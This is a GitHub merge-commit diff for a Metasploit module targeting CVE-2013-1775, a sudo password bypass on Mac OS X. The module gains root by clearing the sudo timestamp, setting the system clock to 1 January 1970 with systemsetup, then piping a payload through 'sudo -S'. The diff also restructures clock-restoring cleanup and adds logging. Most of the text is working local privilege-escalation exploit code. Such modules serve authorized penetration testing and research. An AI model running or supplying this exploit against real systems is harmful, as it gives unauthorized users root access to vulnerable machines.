Merge pull request #2 from jvazquez-r7/test_osx

merge in @jvazquez-r7's fixes for osx sudo module
agix · Aug 24, 2013 · 155f336 · 155f336
2 parents ba27eab + fc91380
commit 155f336
Showing 1 changed file with 86 additions and 30 deletions.
diff --git a/...s/post/osx/manage/sudo_password_bypass.rb → ...xploits/osx/local/sudo_password_bypass.rb b/...s/post/osx/manage/sudo_password_bypass.rb → ...xploits/osx/local/sudo_password_bypass.rb
@@ -37,32 +37,41 @@ def initialize(info={})
 				ran the sudo command.
 			},
 			'License'       => MSF_LICENSE,
-			'Author'        => [ 'joev <jvennix[at]rapid7.com>'],
-			'Platform'      => [ 'osx' ],
-			'SessionTypes'  => [ 'shell', 'meterpreter'],
-			'References'    => [['CVE', '2013-1775']],
+			'Author'        =>
+				[
+					'Todd C. Miller', # Vulnerability discovery
+					'joev <jvennix[at]rapid7.com>' # Metasploit module
+				],
+			'References'    =>
+				[
+					['CVE', '2013-1775'],
+					['OSVDB', '90677']
+				],
 			'Platform'      => 'osx',
-			'Arch'          => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
+			'Arch'          => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
+			'SessionTypes'  => [ 'shell', 'meterpreter'],
 			'Targets'       => [
-				[
-					'Mac OS X x86 (Native Payload)', {
+				[ 'Mac OS X x86 (Native Payload)',
+					{
 						'Platform' => 'osx',
 						'Arch' => ARCH_X86
 					}
-				], [
-					'Mac OS X x64 (Native Payload)', {
+				],
+				[ 'Mac OS X x64 (Native Payload)',
+					{
 						'Platform' => 'osx',
-						'Arch' => ARCH_X64
+						'Arch' => ARCH_X86_64
 					}
-				], [
-					'CMD', {
+				],
+				[ 'CMD',
+					{
 						'Platform' => 'unix',
 						'Arch' => ARCH_CMD
 					}
 				]
 			],
-			'DefaultOptions' => { "PrependFork" => true },
-			'DefaultTarget' => 0
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Feb 28 2013'
 		))
 	end
 
@@ -73,7 +82,7 @@ def check
 			sudo_vn = $1
 			sudo_vn_parts = sudo_vn.split(/[\.p]/).map(&:to_i)
 			# check vn between 1.6.0 through 1.7.10p6
-			# and 1.8.0 through 1.8.6p6 
+			# and 1.8.0 through 1.8.6p6
 			if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
 				print_error "sudo version #{sudo_vn} not vulnerable."
 				return Exploit::CheckCode::Safe
@@ -84,8 +93,7 @@ def check
 		end
 
 		if not user_in_admin_group?
-			print_error "sudo version is vulnerable, but user is not in the "+
-			            "admin group (necessary to change the date)."
+			print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
 			Exploit::CheckCode::Safe
 		end
 		# one root for you sir
@@ -108,30 +116,48 @@ def exploit
 				print_status("Payload dropped and registered for cleanup")
 			end
 
+			print_status("Executing: #{SYSTEMSETUP_PATH} -gettime")
 			@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
+			print_status("Executing: #{SYSTEMSETUP_PATH} -getdate")
 			@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
+			print_status("Executing: #{SYSTEMSETUP_PATH} -getusingnetworktime")
 			@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
+			print_status("Executing: #{SYSTEMSETUP_PATH} -gettimezone")
 			@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
 			@network_server = if @networked
+				print_status("Executing: #{SYSTEMSETUP_PATH} -getnetworktimeserver")
 				cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
 			end
+
+			print_warning("Cleanup to be done in case something goes really bad")
+			print_warning("Execute: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
+			print_warning("Execute: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
+			print_warning("Execute: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
+			if @networked
+				print_warning("Execute: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
+				if @network_server
+					print_warning("Execute: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+				end
+			end
+
 			run_sudo_cmd
 		end
 	end
 
 	def cleanup
-		return if @_cleaning_up
-		@_cleaning_up = true
+		print_status("cleanup callback")
+		if not @_cleaning_up
+			@_cleaning_up = true
+			do_cleanup
+		end
+		super
+	end
 
-		print_status("Resetting system clock to original values") if @time
-		cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
-		cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
-		cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
-		if @networked
-			cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
-			unless @network_server.nil?
-				cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
-			end
+	def on_new_session(session)
+		print_status("on_new_session callback")
+		if not @_cleaning_up
+			@_cleaning_up = true
+			do_cleanup
 		end
 		super
 	end
@@ -145,9 +171,17 @@ def run_sudo_cmd
 			['sudo', '-S', payload.encoded].join(' ')
 		end
 
-		# to prevent the password prompt from destroying session
-		sudo_cmd = 'echo "" | '+sudo_cmd_raw
+		# Ugly stuff just to test CMD tar isnt running because of the env variables not being preserved
+		sudo_cmd_raw.gsub!(/python/, "/usr/bin/python")
+		sudo_cmd_raw.gsub!(/ruby/, "/usr/bin/ruby")
+		sudo_cmd_raw.gsub!(/sh/, "/bin/sh")
+
+		## to prevent the password prompt from destroying session
+		sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & sleep 5'
 
+		print_status("Executing: sudo -k; \n"+
+			"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
+			" -settimezone GMT -settime 00:00")
 		cmd_exec(
 			"sudo -k; \n"+
 			"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
@@ -166,6 +200,28 @@ def run_sudo_cmd
 		print_good output
 	end
 
+	def do_cleanup
+		print_status("Resetting system clock to original values") if @time
+
+		print_status("Executing: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
+		cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
+
+		print_status("Executing: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
+		cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
+
+		print_status("Executing: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
+		cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
+
+		if @networked
+			print_status("Executing: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
+			cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
+			unless @network_server.nil?
+				print_status("Executing: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+				cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+			end
+		end
+	end
+
 	# helper methods for accessing datastore
 	def using_native_target?; target.name =~ /native/i; end
 	def using_cmd_target?; target.name =~ /cmd/i; end